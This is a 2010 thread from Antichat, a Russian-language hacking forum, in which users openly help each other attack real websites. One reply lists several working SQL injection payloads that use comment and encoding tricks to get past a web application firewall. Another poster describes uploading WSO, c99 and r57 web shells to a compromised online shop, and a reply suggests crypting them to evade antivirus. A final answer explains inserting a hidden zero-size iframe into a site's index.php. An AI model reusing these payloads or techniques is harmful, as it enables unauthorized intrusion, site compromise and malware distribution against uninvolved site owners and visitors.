ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.08.2010, 17:20
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от SEWERN
SEWERN said:
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
А зачем крутить скуль на алиасах? Алиасы на другом сервере? Если на одном, то заливай шелл и получишь доступ и к алиасам.
А что касается фильтра, то urlencode пробуй или поиграйся с регистром букв в запросах.
|
|
|
08.08.2010, 17:55
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от SEWERN
SEWERN said:
нашел скул на одном сайте , раскрутил все норм. потом узнал что есть тот же домен на других зонах .ca u .com , на них стоит тот же двиг но при попытке заюзать скул (+union+select и тд) выдает
"Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request." и так везде ((
можно както обойти фильтр ?
WAF, судя по всему.
Некоторые варианты из многих возможных:
Код HTML:
HTML:
-9999+/*!12345union*/+/*!12345select*/+1,2,table_name,4,5+/*!12345from*/+information_schema.tables
Код HTML:
HTML:
-9999+/*!union+select+1,2,table_name,4,5+from+information_schema.tables*/
Код HTML:
HTML:
-9999+/*%00*/union/*%00*/+/*%00*/select/*%00*/+1,2,table_name,4,5+/*%00*/from/*%00*/+information_schema.tables
Код HTML:
HTML:
-9999+/*!union*/+/*!select*/+1,2,table_name,4,5+/*!from*/+information_schema.tables
Код HTML:
HTML:
-9999/*!union+select+1,2,table_name,4,5+'aaa'from+information_schema.tables*/
Либо если есть возможность, то отправлять POST' ом, либо подзапросы.
|
|
|
|
08.08.2010, 18:01
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от legaljo
legaljo said:
Продолжать крутить скули если появляется страница с надписью "hacking attempt"?
продолжай...
|
|
|
|
08.08.2010, 20:22
|
|
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612
Репутация:
94
|
|
да , сайты на других серверах.
Всем спасибо , попробую urlencode и варианты от Redwood.
|
|
|
|
08.08.2010, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
9796
Репутация:
0
|
|
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
|
|
|
|
08.08.2010, 22:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
1882
Репутация:
0
|
|
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
|
|
|
|
08.08.2010, 22:44
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от manmerritt0
manmerritt0 said:
Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.
Вобщем такой вопрос:
Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:
Safe-mode: ON
open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
Chmod: ---------, т.е. походу вообще ничего нельзя делать
Залил другой шелл: c99 от madnet - тоже самое.
Залил шелл r57 от wolfa - все стало гораздо лучше:
Safe-mode: OFF
open_basedir - нет ограничений
Chmod:drwxrwxrwx
Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.
P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
|
|
|
|
08.08.2010, 22:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
1882
Репутация:
0
|
|
Сообщение от Gorev
Gorev said:
да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
|
|
|
|
08.08.2010, 23:12
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Сообщение от manmerritt0
manmerritt0 said:
Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.
А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
|
|
|
|
08.08.2010, 23:41
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от M.MIB
M.MIB said:
Как вставить ifraim в тело index.php чтобы главная страница не умерла???
А почему она должна умереть?))
Находи тот участок кода, который выводит текст на страницу. Например контакты организации. И в конце строки вставляй свой iframe, только не забудь поставить width и height в ноль и visible:no.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
